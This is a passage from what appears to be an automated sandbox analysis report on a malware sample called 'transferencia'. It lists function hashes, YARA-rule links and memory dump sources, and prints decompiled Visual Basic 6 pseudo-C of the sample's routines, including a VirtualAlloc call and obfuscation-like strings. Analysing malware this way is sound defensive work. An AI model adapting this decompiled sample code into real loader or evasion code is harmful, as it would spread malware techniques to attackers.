Opcode Fuzzy Hash: 14a2afb4d29ab64513a10b5d24796fcd0c7fa4525c910576a398d0625e39b8da
Instruction Fuzzy Hash: B5415D32B1A7004B875998BE48C0917D0C7DFEB26177AA63A662DF3365FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DFF, Relevance: 1.5, APIs: 1, Instructions: 221memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 934bd9b83cdbe5301dbe6f0f416052824d4ca5c80fb7aab52df8d598cfcc908e
Instruction ID: 5890f33060e3aa4d3a390f0bb418d996e02f3520d2ad8e274a51efaeec6b4c95
Opcode Fuzzy Hash: 934bd9b83cdbe5301dbe6f0f416052824d4ca5c80fb7aab52df8d598cfcc908e
Instruction Fuzzy Hash: 22416D36B197004B875988BE48D0917D0C7DFEB26077AA63A262DF3364FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0230115F, Relevance: 1.6, Strings: 1, Instructions: 377COMMON

Download Yara Rule

Strings

)\iE, xrefs: 023014AB

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID: )\iE
API String ID: 0-726764941
Opcode ID: 9bb12189e1edd20f231b577895a575699a849bacecb4e0198e82b6fd1fd7629e
Instruction ID: 88f46b2e8845bc3c4a3dd6da5330f496d43093d09f48f38584e6e12844ccc154
Opcode Fuzzy Hash: 9bb12189e1edd20f231b577895a575699a849bacecb4e0198e82b6fd1fd7629e
Instruction Fuzzy Hash: 33D10671700706EFEB249E68CCE0BD6B3A5FF08354F944229EC9997681D735A885CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 023049B4, Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71be72caedf2db3cbeca1f7bf0313d240f1a3ea8404e327c627e58b4643f80e6
Instruction ID: b73124bf7916fd3b003dc37ffa072d36afd68375e27d20d1db9b2635fd7de4e5
Opcode Fuzzy Hash: 71be72caedf2db3cbeca1f7bf0313d240f1a3ea8404e327c627e58b4643f80e6
Instruction Fuzzy Hash: DD819474A043429FDF25CF28C4E8755BB91AF56224F44829ADBA58F2EAD334C542C736

Uniqueness

Uniqueness Score: -1.00%

Function 02301057, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082e3c5bdba90c6850a54c9fcc911c4320e554eb2ab970bad76809ad15665b0e
Instruction ID: 46506498fb11e031138c110dfca31768c38c488ad6fa2be58cc1e3a72d79ce32
Opcode Fuzzy Hash: 082e3c5bdba90c6850a54c9fcc911c4320e554eb2ab970bad76809ad15665b0e
Instruction Fuzzy Hash: 2D210030BC8A2639F72A74A8CC1579D9927D78D6D0FA88024EE64DB0F3D355EC42C4D2

Uniqueness

Uniqueness Score: -1.00%

Function 02301609, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1460cff9787b493682b72ccb36c9aadab9fca2302e2634c024da6ed75087ef6d
Instruction ID: 957891fc6d5f061d2e6dbf1a1f2c4cd9cb534aa0865ab294016a0fb7bbe13e12
Opcode Fuzzy Hash: 1460cff9787b493682b72ccb36c9aadab9fca2302e2634c024da6ed75087ef6d
Instruction Fuzzy Hash: F1310771700706AFD764AE68CCE1BDA33E9BF05760F554129EC9DD3680E725E8848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02301808, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ea71ddf44c1c9a0e0a9f626f37a091093814cc82413fedfd673d53ffde10b2
Instruction ID: 14c7c30105b596fd6d1b69c081eecf452007567cec8333f177167ffb8524ce5c
Opcode Fuzzy Hash: 44ea71ddf44c1c9a0e0a9f626f37a091093814cc82413fedfd673d53ffde10b2
Instruction Fuzzy Hash: 6331D3303403019FE7246F24DDACBE573A6BF00B54F998148ED4A5B1D2D7B4D584CB22

Uniqueness

Uniqueness Score: -1.00%

Function 02304474, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c73e499360f25c522423059009bb052746ffcf53e8c82d6294b8443934381f4
Instruction ID: 1c35071e943829610a547f6c5849be56f83cd8457f46b7feaccb234aac0436b9
Opcode Fuzzy Hash: 4c73e499360f25c522423059009bb052746ffcf53e8c82d6294b8443934381f4
Instruction Fuzzy Hash: 50F06D753016008FD314DE18C6E0F5673E5AF64740F568978EB04C76A2D334ED40CA30

Uniqueness

Uniqueness Score: -1.00%

Function 0230435E, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c7de3c22fee2d3733c6efaf7ef2959576e2f85d34607df6187ec67b24c1729
Instruction ID: 9afd450d6e7acdcaddabfacf3b9fd5ade2a18aded60151038c43388af0292ad6
Opcode Fuzzy Hash: 19c7de3c22fee2d3733c6efaf7ef2959576e2f85d34607df6187ec67b24c1729
Instruction Fuzzy Hash: 75C09B7640010ABBCF025FD0CA0CA9F3F25FF05311F108450B915D5010D775C920DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0230245C, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163881ea92df55fa75af270fd689b84cfa93274ebf0f126d9f57dc69628e93fc
Instruction ID: 2d3c1a17b4a0f816a82722049af65ba7cd713cd1e74c8346b6a6f4103ce2f02c
Opcode Fuzzy Hash: 163881ea92df55fa75af270fd689b84cfa93274ebf0f126d9f57dc69628e93fc
Instruction Fuzzy Hash: F7C092B62415818FFB41EF0CD592B4073A1FF11AD8B880490E482CFA12C324ED15CA05

Uniqueness

Uniqueness Score: -1.00%

Function 02304078, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac43d05c4959b71de15883019098096296cabaea58adb422b002051360e42b19
Instruction ID: b1e4eb180d00a43fcafbb13eedf511af51a006101f2e5a38a003103e8c9df502
Opcode Fuzzy Hash: ac43d05c4959b71de15883019098096296cabaea58adb422b002051360e42b19
Instruction Fuzzy Hash: 9BB092313109408FCA62CE28C290F8173F0BF20B80B0144D0A440C7A91D324E900C900

Uniqueness

Uniqueness Score: -1.00%

Function 023051D1, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2300000_transferencia.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeafa03d48bc390408c59c474862eeb80a5e8754063925e1ec4441e030f0515a
Instruction ID: 790e0d19b5fa6c94f41eff63ae6443ff61c77d8d2320338748d2a7ad44a99e0b
Opcode Fuzzy Hash: aeafa03d48bc390408c59c474862eeb80a5e8754063925e1ec4441e030f0515a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0F1, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 331
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040F0F1(void* __ebx, void* __edi, void* __esi, signed long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				intOrPtr _v144;
				char _v152;
				short _v172;
				char _v176;
				void* _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr* _v204;
				signed int _v208;
				intOrPtr* _v212;
				short _v216;
				signed long long _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				signed long long _v240;
				signed long long _v244;
				signed int _v248;
				signed int _v252;
				intOrPtr* _v256;
				signed int _v260;
				char* _t156;
				signed int _t160;
				signed int _t164;
				signed int _t171;
				signed int _t174;
				signed int _t178;
				char* _t182;
				signed int _t186;
				intOrPtr _t187;
				char* _t188;
				signed int _t195;
				char* _t203;
				signed int _t207;
				intOrPtr _t216;
				intOrPtr _t227;
				void* _t238;
				void* _t240;
				intOrPtr* _t241;
				intOrPtr* _t242;
				signed long long _t256;
				signed long long _t257;

				_t256 = __fp0;
				_t241 = _t240 - 0xc;
				 *[fs:0x0] = _t241;
				L00401230();
				_v16 = _t241;
				_v12 = 0x401150;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401236, _t238);
				if( *0x412010 != 0) {
					_v204 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v204 = 0x412010;
				}
				_t156 =  &_v36;
				L004013A4();
				_v180 = _t156;
				_t160 =  *((intOrPtr*)( *_v180 + 0x90))(_v180,  &_v172, _t156,  *((intOrPtr*)( *((intOrPtr*)( *_v204)) + 0x340))( *_v204));
				asm("fclex");
				_v184 = _t160;
				if(_v184 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(0x90);
					_push(0x40d2b4);
					_push(_v180);
					_push(_v184);
					L004013CE();
					_v208 = _t160;
				}
				if( *0x412010 != 0) {
					_v212 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v212 = 0x412010;
				}
				_t216 =  *((intOrPtr*)( *_v212));
				_t164 =  &_v40;
				L004013A4();
				_v188 = _t164;
				_v144 = 0x80020004;
				_v152 = 0xa;
				_v128 = 0x80020004;
				_v136 = 0xa;
				_v112 = 0x80020004;
				_v120 = 0xa;
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v216 = _v172;
				asm("fild dword [ebp-0xd4]");
				_v220 = _t256;
				_t257 = _v220;
				 *_t241 = _t257;
				_t171 =  *((intOrPtr*)( *_v188 + 0x130))(_v188, _t216, 0x10, 0x10, 0x10, _t164,  *((intOrPtr*)(_t216 + 0x32c))( *_v212));
				asm("fclex");
				_v192 = _t171;
				if(_v192 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40d2c4);
					_push(_v188);
					_push(_v192);
					L004013CE();
					_v224 = _t171;
				}
				_push( &_v40);
				_push( &_v36);
				_push(2);
				L00401398();
				_t242 = _t241 + 0xc;
				_v48 = 1;
				_v56 = 2;
				_t174 =  &_v56;
				_push(_t174);
				_push(2);
				_push(L"FGFG");
				L00401386();
				L0040138C();
				_push(_t174);
				_push(0x40d2e8);
				L00401392();
				asm("sbb eax, eax");
				_v180 =  ~( ~( ~_t174));
				L004013BC();
				L004013AA();
				_t178 = _v180;
				if(_t178 != 0) {
					if( *0x412010 != 0) {
						_v228 = 0x412010;
					} else {
						_push(0x412010);
						_push(0x40d778);
						L0040139E();
						_v228 = 0x412010;
					}
					_t227 =  *((intOrPtr*)( *_v228));
					_t203 =  &_v36;
					L004013A4();
					_v180 = _t203;
					_t207 =  *((intOrPtr*)( *_v180 + 0x188))(_v180,  &_v176, _t203,  *((intOrPtr*)(_t227 + 0x310))( *_v228));
					asm("fclex");
					_v184 = _t207;
					if(_v184 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x40d2ec);
						_push(_v180);
						_push(_v184);
						L004013CE();
						_v232 = _t207;
					}
					asm("fild dword [ebp-0xac]");
					_v240 = _t257;
					_v244 = _v240 *  *0x401148;
					 *_t242 = _v244;
					_t178 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t227);
					asm("fclex");
					_v188 = _t178;
					if(_v188 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x40cb6c);
						_push(_a4);
						_push(_v188);
						L004013CE();
						_v248 = _t178;
					}
					L00401380();
				}
				_push(0x40d300);
				L0040137A();
				if(_t178 != 1) {
					L00401374();
					_t188 =  &_v36;
					L004013A4();
					_v180 = _t188;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_v48 = 0x80020004;
					_v56 = 0xa;
					_t195 =  *((intOrPtr*)( *_v180 + 0x44))(_v180, 0x64ed,  &_v56,  &_v72,  &_v88,  &_v104, _t188, _t178);
					asm("fclex");
					_v184 = _t195;
					if(_v184 >= 0) {
						_v252 = _v252 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40d304);
						_push(_v180);
						_push(_v184);
						L004013CE();
						_v252 = _t195;
					}
					L00401380();
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					_push(4);
					L004013B0();
				}
				if( *0x412010 != 0) {
					_v256 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v256 = 0x412010;
				}
				_t182 =  &_v36;
				L004013A4();
				_v180 = _t182;
				_t186 =  *((intOrPtr*)( *_v180 + 0x60))(_v180,  &_v176, _t182,  *((intOrPtr*)( *((intOrPtr*)( *_v256)) + 0x314))( *_v256));
				asm("fclex");
				_v184 = _t186;
				if(_v184 >= 0) {
					_v260 = _v260 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40d314);
					_push(_v180);
					_push(_v184);
					L004013CE();
					_v260 = _t186;
				}
				_t187 = _v176;
				_v28 = _t187;
				L00401380();
				asm("wait");
				_push(0x40f681);
				return _t187;
			}

0x0040f0f1
0x0040f0f4
0x0040f103
0x0040f10f
0x0040f117
0x0040f11a
0x0040f121
0x0040f130
0x0040f13a
0x0040f157
0x0040f13c
0x0040f13c
0x0040f141
0x0040f146
0x0040f14b
0x0040f14b
0x0040f17b
0x0040f17f
0x0040f184
0x0040f19f
0x0040f1a5
0x0040f1a7
0x0040f1b4
0x0040f1d9
0x0040f1b6
0x0040f1b6
0x0040f1bb
0x0040f1c0
0x0040f1c6
0x0040f1cc
0x0040f1d1
0x0040f1d1
0x0040f1e7
0x0040f204
0x0040f1e9
0x0040f1e9
0x0040f1ee
0x0040f1f3
0x0040f1f8
0x0040f1f8
0x0040f21e
0x0040f228
0x0040f22c
0x0040f231
0x0040f237
0x0040f241
0x0040f24b
0x0040f252
0x0040f25c
0x0040f263
0x0040f26d
0x0040f27a
0x0040f27b
0x0040f27c
0x0040f27d
0x0040f281
0x0040f28e
0x0040f28f
0x0040f290
0x0040f291
0x0040f295
0x0040f29f
0x0040f2a0
0x0040f2a1
0x0040f2a2
0x0040f2aa
0x0040f2b0
0x0040f2b6
0x0040f2bc
0x0040f2c3
0x0040f2d4
0x0040f2da
0x0040f2dc
0x0040f2e9
0x0040f30e
0x0040f2eb
0x0040f2eb
0x0040f2f0
0x0040f2f5
0x0040f2fb
0x0040f301
0x0040f306
0x0040f306
0x0040f318
0x0040f31c
0x0040f31d
0x0040f31f
0x0040f324
0x0040f327
0x0040f32e
0x0040f335
0x0040f338
0x0040f339
0x0040f33b
0x0040f340
0x0040f34a
0x0040f34f
0x0040f350
0x0040f355
0x0040f35c
0x0040f362
0x0040f36c
0x0040f374
0x0040f379
0x0040f382
0x0040f38f
0x0040f3ac
0x0040f391
0x0040f391
0x0040f396
0x0040f39b
0x0040f3a0
0x0040f3a0
0x0040f3c6
0x0040f3d0
0x0040f3d4
0x0040f3d9
0x0040f3f4
0x0040f3fa
0x0040f3fc
0x0040f409
0x0040f42e
0x0040f40b
0x0040f40b
0x0040f410
0x0040f415
0x0040f41b
0x0040f421
0x0040f426
0x0040f426
0x0040f435
0x0040f43b
0x0040f44d
0x0040f45a
0x0040f465
0x0040f46b
0x0040f46d
0x0040f47a
0x0040f49c
0x0040f47c
0x0040f47c
0x0040f481
0x0040f486
0x0040f489
0x0040f48f
0x0040f494
0x0040f494
0x0040f4a6
0x0040f4a6
0x0040f4ab
0x0040f4b0
0x0040f4b8
0x0040f4be
0x0040f4c4
0x0040f4c8
0x0040f4cd
0x0040f4d3
0x0040f4da
0x0040f4e1
0x0040f4e8
0x0040f4ef
0x0040f4f6
0x0040f4fd
0x0040f504
0x0040f52e
0x0040f531
0x0040f533
0x0040f540
0x0040f562
0x0040f542
0x0040f542
0x0040f544
0x0040f549
0x0040f54f
0x0040f555
0x0040f55a
0x0040f55a
0x0040f56c
0x0040f574
0x0040f578
0x0040f57c
0x0040f580
0x0040f581
0x0040f583
0x0040f588
0x0040f592
0x0040f5af
0x0040f594
0x0040f594
0x0040f599
0x0040f59e
0x0040f5a3
0x0040f5a3
0x0040f5d3
0x0040f5d7
0x0040f5dc
0x0040f5f7
0x0040f5fa
0x0040f5fc
0x0040f609
0x0040f62b
0x0040f60b
0x0040f60b
0x0040f60d
0x0040f612
0x0040f618
0x0040f61e
0x0040f623
0x0040f623
0x0040f632
0x0040f638
0x0040f63e
0x0040f643
0x0040f644
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040F10F
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 0040F146
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F17F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D2B4,00000090), ref: 0040F1CC
__vbaNew2.MSVBVM60(0040D778,00412010), ref: 0040F1F3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F22C
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F26D
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F281
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F295
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D2C4,00000130,?,?,00000000), ref: 0040F301
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0040F31F
#631.MSVBVM60(FGFG,00000002,00000002), ref: 0040F340
__vbaStrMove.MSVBVM60(FGFG,00000002,00000002), ref: 0040F34A
__vbaStrCmp.MSVBVM60(0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F355
__vbaFreeStr.MSVBVM60(0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F36C
__vbaFreeVar.MSVBVM60(0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F374
__vbaNew2.MSVBVM60(0040D778,00412010,0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F39B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F3D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D2EC,00000188), ref: 0040F421
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,0040CB6C,00000084), ref: 0040F48F
__vbaFreeObj.MSVBVM60(00000000,00401150,0040CB6C,00000084), ref: 0040F4A6
__vbaLenBstr.MSVBVM60(0040D300,0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F4B0
#685.MSVBVM60(0040D300,0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F4BE
__vbaObjSet.MSVBVM60(?,00000000,0040D300,0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F4C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D304,00000044), ref: 0040F555
__vbaFreeObj.MSVBVM60(00000000,?,0040D304,00000044), ref: 0040F56C
__vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0040F583
__vbaNew2.MSVBVM60(0040D778,00412010,0040D300,0040D2E8,00000000,FGFG,00000002,00000002), ref: 0040F59E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F5D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D314,00000060), ref: 0040F61E
__vbaFreeObj.MSVBVM60(00000000,?,0040D314,00000060), ref: 0040F63E

Strings

FGFG, xrefs: 0040F33B

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$List$#631#685BstrMove
String ID: FGFG
API String ID: 2015838086-2759163656
Opcode ID: 2da381b1716c928121a59b0f7e9bac0714a49c307e22573fef90aa6ad95b2317
Instruction ID: 9a89c45b41cd0a118ad218848c035a0cc06090607446c736700c9b4c94954a37
Opcode Fuzzy Hash: 2da381b1716c928121a59b0f7e9bac0714a49c307e22573fef90aa6ad95b2317
Instruction Fuzzy Hash: 52E10671900218EFDB20DF90C945BDDBBB6BB08304F1045FAE909BB2A1C7795A98DF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF3C, Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040FF3C(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int* _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				long long* _v44;
				char _v56;
				char _v64;
				signed int _v68;
				intOrPtr _v76;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				char _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				char* _t97;
				char* _t101;
				signed int _t105;
				char* _t107;
				signed int _t114;
				signed int _t120;
				char* _t124;
				void* _t142;
				void* _t144;
				signed int* _t145;
				signed int _t150;
				signed int _t156;

				_t124 = __ecx;
				_t145 = _t144 - 0xc;
				 *[fs:0x0] = _t145;
				L00401230();
				_v16 = _t145;
				_v12 = 0x4011e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401236, _t142);
				_push(5);
				_push(0x40d444);
				_push( &_v56);
				L0040133E();
				 *_v44 =  *0x4011e0;
				 *((long long*)(_v44 + 8)) =  *0x4011d8;
				_v120 =  &_v56;
				_t156 =  *0x4011d0;
				_push(__ecx);
				_push(__ecx);
				 *_t145 = _t156;
				asm("fld1");
				_push(__ecx);
				_push(__ecx);
				_v68 = _t156;
				_t97 =  &_v120;
				_push(_t97);
				L00401338();
				L0040134A();
				asm("fcomp qword [0x4011c8]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x412358 != 0) {
						_v152 = 0x412358;
					} else {
						_push(0x412358);
						_push(0x40d364);
						L0040139E();
						_v152 = 0x412358;
					}
					_t16 =  &_v152; // 0x412358
					_v124 =  *((intOrPtr*)( *_t16));
					_t114 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v64);
					asm("fclex");
					_v128 = _t114;
					if(_v128 >= 0) {
						_t27 =  &_v156;
						 *_t27 = _v156 & 0x00000000;
						__eflags =  *_t27;
					} else {
						_push(0x1c);
						_push(0x40d354);
						_push(_v124);
						_push(_v128);
						L004013CE();
						_v156 = _t114;
					}
					_v132 = _v64;
					_v92 = 0x80020004;
					_v100 = 0xa;
					L00401230();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t120 =  *((intOrPtr*)( *_v132 + 0x54))(_v132, 0x10,  &_v68);
					asm("fclex");
					_v136 = _t120;
					if(_v136 >= 0) {
						_t43 =  &_v160;
						 *_t43 = _v160 & 0x00000000;
						__eflags =  *_t43;
					} else {
						_push(0x54);
						_push(0x40d3e0);
						_push(_v132);
						_push(_v136);
						L004013CE();
						_v160 = _t120;
					}
					_v148 = _v68;
					_t47 =  &_v68;
					 *_t47 = _v68 & 0x00000000;
					_t150 =  *_t47;
					_v76 = _v148;
					_v84 = 9;
					_t97 = 0x10;
					L00401230();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L00401332();
					L00401380();
					_t124 =  &_v84;
					L004013AA();
				}
				asm("fld1");
				_push(_t124);
				_push(_t124);
				 *_t145 = _t156;
				asm("fld1");
				_push(_t124);
				_push(_t124);
				 *_t145 = _t156;
				asm("fld1");
				_push(_t124);
				_push(_t124);
				 *_t145 = _t156;
				_push(_t124);
				_push(_t124);
				 *_t145 =  *0x4011c0;
				L0040132C();
				L0040134A();
				asm("fcomp qword [0x4011d0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t150 != 0) {
					L00401326();
				}
				_push(0x40d3f4);
				_push(0x40d400);
				_push(0);
				L00401320();
				if(_t97 != 1) {
					_v92 = L"WARNISS";
					_v100 = 8;
					L00401368();
					_push( &_v84);
					L0040131A();
					L004013AA();
				}
				if( *0x412010 != 0) {
					_v164 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v164 = 0x412010;
				}
				_t101 =  &_v64;
				L004013A4();
				_v124 = _t101;
				_v92 = 0x80020004;
				_v100 = 0xa;
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t105 =  *((intOrPtr*)( *_v124 + 0x1ec))(_v124, L"FRIGATOON", 0x10, _t101,  *((intOrPtr*)( *((intOrPtr*)( *_v164)) + 0x328))( *_v164));
				asm("fclex");
				_v128 = _t105;
				if(_v128 >= 0) {
					_t80 =  &_v168;
					 *_t80 = _v168 & 0x00000000;
					__eflags =  *_t80;
				} else {
					_push(0x1ec);
					_push(0x40d430);
					_push(_v124);
					_push(_v128);
					L004013CE();
					_v168 = _t105;
				}
				L00401380();
				_v28 = 0x651c3d;
				asm("wait");
				_push(0x41027b);
				L00401380();
				_v120 =  &_v56;
				_t107 =  &_v120;
				_push(_t107);
				_push(0);
				L00401314();
				return _t107;
			}

0x0040ff3c
0x0040ff3f
0x0040ff4e
0x0040ff5a
0x0040ff62
0x0040ff65
0x0040ff6c
0x0040ff7b
0x0040ff7e
0x0040ff80
0x0040ff88
0x0040ff89
0x0040ff97
0x0040ffa2
0x0040ffa8
0x0040ffab
0x0040ffb1
0x0040ffb2
0x0040ffb3
0x0040ffb6
0x0040ffb8
0x0040ffb9
0x0040ffba
0x0040ffbd
0x0040ffc0
0x0040ffc1
0x0040ffc6
0x0040ffcb
0x0040ffd1
0x0040ffd3
0x0040ffd4
0x0040ffe1
0x0040fffe
0x0040ffe3
0x0040ffe3
0x0040ffe8
0x0040ffed
0x0040fff2
0x0040fff2
0x00410008
0x00410010
0x0041001f
0x00410022
0x00410024
0x0041002b
0x00410047
0x00410047
0x00410047
0x0041002d
0x0041002d
0x0041002f
0x00410034
0x00410037
0x0041003a
0x0041003f
0x0041003f
0x00410051
0x00410054
0x0041005b
0x00410069
0x00410073
0x00410074
0x00410075
0x00410076
0x0041007f
0x00410082
0x00410084
0x00410091
